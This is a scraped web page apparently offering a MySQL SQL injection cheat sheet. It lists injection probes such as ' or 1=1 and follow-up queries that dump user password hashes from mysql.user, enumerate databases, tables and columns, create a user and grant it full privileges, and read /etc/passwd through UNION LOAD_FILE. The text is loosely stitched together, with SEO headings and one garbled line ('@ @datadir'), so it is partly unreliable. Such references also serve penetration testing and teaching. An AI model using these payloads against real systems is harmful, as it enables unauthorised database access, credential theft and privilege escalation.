Small list of MySQL injection commands. These are the commands that come after your actual injection string, Ex: ‘ or 1=1’.

  • The Ultimate SQL Injection Cheat Sheet SQL Injection is the most commonly found vulnerability in web applications according to Open Web Application Security Project (OWASP).
  • SQL-Injection-cheat-sheet First try to figure out the vulnerable parameter NOTE: If it's a GET request don't forget to url encode the characters. Param=' - try to get error param=' - try to get error param=' or 1=1 - try if it works param=' or 1=0 - check if it returns nothing param=' and 1=1.

Mysql Sql Injection Cheat Sheet Example

Mysqlrealescapestring takes a string that is going to be used in a MySQL query and return the same string with all SQL injection attempts safely escaped. Basically, it will replace those troublesome quotes(') a user might enter with a MySQL-safe substitute, an escaped quote '.

SELECT @@version — Show version

SELECT 1 #comment — comment method

SELECT /*comment*/1 — comment method

SELECT user FROM mysql.user — List Users

SELECT host, user, password FROM mysql.user — List Password Hashes

SELECT database() — Show current database

SELECT schema_names FROM information_schema.schemata — List Databases For MySQL >= v5.0

SELECT distinct(db) FROM mysql.db — List Databases

SELECT table_schema,table_name FROM information_schema.tables — List Tables

Mysql Sql Injection Cheat Sheet Printable

SELECT table_schema,table_name,column_name FROM information_schema.columns — List Columns

SELECT table_schema, table_name FROM information_schema.columns WHERE column_name='username' — Find tables which have a column called ‘username’

SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0 — Number rows starting with 0.

SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1 — Number rows starting with 1.

SELECT substr('abcd', 3, 1) — Return Nth Char, Ex. returns ‘c’.

SELECT 6 & 2 — Ex. returns 2, Bitwise AND

SELECT 6 & 1 — Ex. returns 0, Bitwise AND

CREATE USER test1 IDENTIFIED BY 'pass 1' — Create User

Mysql Login Sql Injection Cheat Sheet

DROP USER test1 — Delete USER

GRANT ALL PRIVILEGES ON *.* TO test1 @'%' — Make User DBA

SELECT @ @datadir — Location of DB files

Sheet

' UNION ALL SELECT LOAD_FILE('/etc/passwd') — Local File Access